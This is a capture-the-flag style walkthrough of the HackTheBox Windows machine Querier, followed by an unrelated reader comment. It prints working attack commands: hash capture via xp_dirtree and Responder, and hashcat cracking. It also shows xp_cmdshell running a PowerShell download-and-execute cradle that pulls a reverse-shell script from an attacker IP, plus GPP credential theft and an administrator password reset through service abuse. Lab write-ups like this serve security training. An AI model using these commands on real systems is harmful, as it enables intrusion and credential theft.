Hello Everyone!! In this post we will see how to pwn Querier from hackthebox.
Summary
Querier is a medium windows machine. The initial foothold requires to enumerate the smb shares to obtain the password for a user, reporting who can log in in to the mssql-server. To get the user on the system, we can steal the hash of mssql-svc user by running xp_dirtree command. Privilege escalation to the administrator is pretty straight forward as the box stores the administrator creds in the GPP .XML files.
With all that being said, let’s get started.
Initial foothold
Running a nmap scan resulted in a lot of open ports. But this time port 80 wasn’t present. So the only remaining point to start the enumeration was smb.
# nmap -sC -sV -o querier.nmap 10.10.10.125 Nmap scan report for 10.10.10.125 Host is up (0.27s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00 | ms-sql-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: QUERIER | DNS_Domain_Name: HTB.LOCAL | DNS_Computer_Name: QUERIER.HTB.LOCAL | DNS_Tree_Name: HTB.LOCAL |_ Product_Version: 10.0.17763 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2020-07-05T15:44:27 |_Not valid after: 2050-07-05T15:44:27 |_ssl-date: 2020-07-05T15:45:28+00:00; +4m44s from scanner time. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 4m44s, deviation: 0s, median: 4m43s | ms-sql-info: | 10.10.10.125:1433: | Version: | name: Microsoft SQL Server | number: 14.00.1000.00 | Product: Microsoft SQL Server |_ TCP port: 1433 | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-07-05 21:15:32 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Jul 5 21:10:54 2020 -- 1 IP address (1 host up) scanned in 41.58 seconds
Meanwhile I started a full port scan as well
# nmap -p- -sV -A -T4 -vv 10.10.10.125 -o fullport.nmap
Listed all the shares with smbclient
⚡ root@kali ~/Desktop/htb/querier> master smbclient -L 10.10.10.125 Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reports Disk
Reports share seemed a custom one created so I listed its contents with smbmap
# smbmap -R “Reports” -H 10.10.10.125
Downloaded the xlsm file with smbmap
#smbmap -R "Reports" -H 10.10.10.125 -A 'Currency Volume Report.xlsm'
If you are unaware of .xlsm extension, let me answer it for you.
Files with XLSM extension is a type of Spreasheet files that support Macros. XLSM files are similar to XLM file formats but are based on the Open XML format introduced in Microsoft Office 2007. A macro is used to record the steps that are performed repeatedly and facilitates performing the actions by running the macro again. All the steps performed by the users are recorded and the process is termed macro recording. Macro recording generates VBA code in the form of a macro that can be edited using the Visual Basic Editor (VBE).
There is a python package available that works with this extension. It can be installed with pip
# pip install python-oletools
Under oletools, we have olevba that is used to extract and analyze VBA Macro source code from MS Office documents.
# olevba 10.10.10.125-Reports_Currency\ Volume\ Report.xlsm
Username: Password -> reporting:PcwTWTHRwryjc$c6
In the output we can see that the olevba retrieved us the username and the password.
So now lets try to login into the mssql server.
Here the impacket script, mssqlclient.py can be used to login to the server. -windows-auth flag has to be explicitly specified as it is disabled by default.
# mssqlclient.py reporting@10.10.10.125 -windows-auth
And we are logged in!!!
Getting the user.txt
With reporting as user, we had minimal privileges. But the user can easily steal the hash of the service running. This can be done with xp_dirtree. It is a stored procedure that returns a list of every folder, every subfolder, and every file for path you give it. Here we can set the path to a fake share name that doesn’t even exist and start a responder on tun0. When the service tried to access the share, the responder will log the hash of service account.
# xp_dirtree ‘\\10.10.1415\test\’
# responder -I tun0
The hash is of the type NTLMv2. We can find the mode of the hash inside hashcat example hashes and it comes out to be 5600.
# hashcat -m 5600 hash_sql /usr/share/wordlists/rockyou.txt --force
The username is mssql-svc(can be seen in the hash) password is corporate568. After trying these creds on mssqlclient.py, I got successfully logged in.
This time the enable_xp_cmdshell was available for the user. With this command we can execute commands on the sql-server.
We are now mssql-svc.
Reverse shell
I used Invoke-PowerShellTcp.ps1 from nishang scripts to obtain the reverse shell. Set up the nc listener and SimpleHTTPServer on port 80.
Run the following command on the sql prompt
> xp_cmdshell powershell IEX(New-Object Net.Webclient).downloadString(\"http://10.10.14.15/rev.ps1\")
An we got the shell. Grab the user.txt
Privilege escalation to administrator
Upload the PowerUp.ps1 script from powersploit tools that’s used to enumerate the box.
# xp_cmdshell powershell IEX(New-Object Net.Webclient).downloadString(\"http://10.10.14.15/PowerUp.ps1\")
# Invoke-AllChecks
In the results of PowerUp enumeration, I found two routes that could lead us to administrator. First was abusing the usosvc service as we had the privilege to restart the service. I will show this route at the end of the blog.
In the enumeration, I also found the GPP .xml files that directly returned the password of the administrator.
Administrator:MyUnclesAreMarioAndLuigi!!1!
I used these creds on impacket’s psexec.py and got successfully logged in.
# psexec.py administrator@10.10.10.125
Box is pwned!!!
Now the alternative!
Since we could abuse the usosvc service, I tried running
# Invoke-ServiceAbuse -Name ‘UsoSvc’ -Command ‘net user administrator hacked!!’
This command will change the password of administrator to hacked!!
Again, the creds can be used with psexec.py to obtain the shell as admin.
Thats all for the blog post. Thanks for reading! For more such content subscribe to my page.
See you in the next one!! Until then, happy hunting.
When I originally commented I clicked the “Notify me when new comments are added” checkbox
and now each time a comment is added I get four e-mails with
the same comment. Is there any way you can remove
me from that service? Thanks a lot!